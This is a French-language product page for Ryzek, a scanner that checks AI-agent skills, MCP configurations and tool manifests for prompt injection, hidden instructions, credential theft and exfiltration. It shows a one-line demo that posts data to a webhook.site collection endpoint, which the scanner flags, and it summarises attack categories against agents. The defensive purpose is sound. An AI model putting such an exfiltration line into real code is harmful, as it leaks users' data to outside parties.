Analyse de sécurité pour les agents IA
Sachez ce que fait un skill avant que votre agent ne l'exécute.
Ryzek lit les skills, les configurations de serveurs MCP et les manifestes d'outils, et signale les prompt injection, les instructions cachées, le vol d'identifiants, les permissions trop larges et les outils modifiés après votre approbation. Chaque résultat est accompagné d'un score de confiance et de sa raison.
Forfait Free : 20 analyses par mois, toutes les règles incluses. Les fichiers analysés sont lus en mémoire et jamais stockés.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek a trouvé 1 problème
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
Résultat réel du scanner, généré lors de la création de cette page.
La bande-annonce
Ryzek en quatre-vingts secondes.
Ce qui est discrètement confié aux agents — et ce que Ryzek vous montre avant qu'ils ne l'exécutent.
Comment ça marche
De l'envoi à un verdict actionnable.
Aucune installation. Connectez-vous, ajoutez vos fichiers, lisez ce que Ryzek a trouvé et pourquoi.
-
01 · Connexion
Créer un compte gratuit
Connectez-vous avec un compte que vous avez déjà. Votre allocation d'analyses et votre historique d'outils vous suivent sur n'importe quel appareil.
-
02 · Ajouter des fichiers
Déposez ce que votre agent charge
Dossiers de skills avec leurs scripts, configurations MCP, manifestes d'outils,
package.jsonourequirements.txt. -
03 · Lire
Obtenez une raison, pas seulement une alerte
Chaque résultat indique sa gravité, le degré de confiance de Ryzek, pourquoi, le texte exact qui l'a déclenché et sa catégorie OWASP.
-
04 · Réanalyser
Soyez averti quand un outil change
Ryzek conserve une empreinte de chaque outil — pas le fichier — afin qu'une analyse ultérieure puisse vous dire si quelque chose que vous avez approuvé a changé.
Ce qu'il détecte
54 règles réparties en cinq types de risques.
Chaque règle a une démo en direct sur la page des règles : le fichier, la partie qui compte, et ce que le scanner rapporte réellement.
18 règles · Sécurité de l'agent
Un texte destiné à l'IA
Prompt injection, instructions cachées dans des commentaires ou des caractères invisibles, résultats d'outils falsifiés et empoisonnement de mémoire.
5 règles · Exfiltration
Les voies de sortie de vos données
Points de collecte, tunnels DNS, balises d'image et outils qui associent lectures privées et écritures publiques.
7 règles · Identifiants
Des secrets au mauvais endroit
Clés codées en dur, jetons dans les configurations MCP, lectures de coffres d'identifiants et d'historique shell, et requêtes de métadonnées cloud.
13 règles · Chaîne d'approvisionnement
D'où vient le code
Serveurs non épinglés et usurpés, versions connues comme vulnérables, hooks d'installation, serveurs fantômes et outils modifiés après approbation.
11 règles · Exécution
Plus de pouvoir que nécessaire pour la tâche
Permissions trop larges, outils approuvés automatiquement, évasions de bac à sable, persistance et injection de commandes.
Toutes les règles
Voir toutes les démos →
Filtrez par risque, lisez la version en langage clair, et consultez le résultat réel de chaque règle.
Pourquoi Ryzek
Des résultats vérifiables, d'un scanner qui indique où il s'arrête.
Un scanner qui crie au loup finit ignoré, et un scanner qui en fait trop devient une confiance mal placée. Ryzek est conçu pour éviter les deux.
Découvrez ce que Ryzek ne peut pas voir — y compris les comportements qui n'apparaissent que pendant l'exécution d'un serveur, et ce qui se trouve dans les programmes compilés.
- Une raison indiquée pour chaque résultat. Le degré de confiance de la règle, et pourquoi — pour qu'un indice à faible confiance ne ressemble pas à une attaque confirmée.
- Détection des modifications. Un outil qui change discrètement après votre approbation est signalé à votre prochaine analyse.
- Vos fichiers ne sont pas conservés. Les envois sont analysés en mémoire puis supprimés. Nous stockons les compteurs d'analyses et les empreintes d'outils, jamais leur contenu.
- Associé à l'OWASP. Chaque règle correspond à une catégorie de l'OWASP MCP Top 10.
- Chaque règle, sur chaque forfait. Les forfaits payants ajouteront du volume et de l'automatisation, pas de la détection.
Tarifs
Commencez gratuitement. Toutes les règles incluses.
Le forfait gratuit exécute l'ensemble complet des règles, avec une limite de volume. Des forfaits payants avec des limites plus hautes ouvrent bientôt.
Disponible dès maintenant
Free — 0 $
20 analyses par mois, les 54 règles, détection des modifications et rapports téléchargeables.
Ouverture bientôt
Pro, Pro Plus et Teams
À partir de 16 $ par mois, avec 300 à 1 500 analyses par mois. Voir ce qui est inclus et demander à être averti à leur ouverture.
Questions
Questions fréquentes.
Conservez-vous les fichiers que j'analyse ?
Non. Les fichiers sont envoyés au scanner via HTTPS, analysés en mémoire, puis supprimés dès que le résultat est renvoyé. Ce que nous stockons, c'est le nombre d'analyses que vous avez utilisées, et une empreinte de chaque outil — hachages plus ses libellés de permission — afin de pouvoir vous signaler s'il change. La politique de confidentialité en donne le détail.
Pourquoi ai-je besoin d'un compte ?
Ainsi, votre allocation d'analyses et votre historique d'outils vous suivent partout. La détection des modifications ne fonctionne que si Ryzek se souvient de l'apparence d'un outil lors de votre dernière analyse.
Quels fichiers puis-je analyser ?
Dossiers de skills (un SKILL.md plus les scripts qui l'accompagnent), fichiers de configuration MCP tels que .mcp.json ou claude_desktop_config.json, manifestes d'outils JSON, et package.json ou requirements.txt pour les hooks d'installation et les dépendances vulnérables.
Un résultat propre signifie-t-il qu'un skill est sûr ?
Non — cela signifie qu'aucune des 54 règles n'a correspondu. Ryzek lit les fichiers ; il ne les exécute pas, donc un comportement qui n'apparaît qu'à l'exécution, ou à l'intérieur d'un programme compilé, échappe à ce qu'il peut voir. Une analyse propre est un bon signe, pas une garantie.
Puis-je l'exécuter en CI ?
Pas encore. L'intégration CI est prévue pour les forfaits payants. Si cela compte pour vous, dites-le-nous — cela nous aide à décider ce qui vient en premier.
Analysez les skills auxquels votre agent fait déjà confiance.
Il faut une minute pour s'inscrire et ajouter vos premiers fichiers.